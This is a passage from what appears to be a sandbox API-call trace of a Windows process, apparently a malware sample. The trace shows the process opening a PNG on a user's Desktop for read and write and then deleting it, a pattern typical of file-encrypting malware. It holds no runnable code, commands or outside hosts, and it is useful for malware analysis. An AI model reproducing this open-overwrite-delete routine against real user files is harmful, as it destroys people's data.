hHeap=0x8a0000) returned 1 [0165.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.558] FreeLibrary (hLibModule=0x75c90000) returned 1 [0165.558] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0165.558] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.558] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0165.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.560] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0165.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.561] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0165.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0165.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bda68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0165.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4egakohibj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0165.561] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0165.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0165.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.562] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0165.562] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0165.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0165.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0165.562] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0165.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd648 [0165.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd648, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0165.564] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0165.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0165.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0165.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.564] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0165.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0165.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0165.565] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0165.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0165.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0165.566] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0165.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0165.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0165.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", lpFilePart=0x0) returned 0x35 [0165.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0x81ab1c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 0x90ae18 [0165.568] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4egakohibj.png")) returned 1 [0165.571] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0x81ab1c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 0 [0165.571] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0165.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.572] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0165.572] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0165.572] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0165.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.573] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.573] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 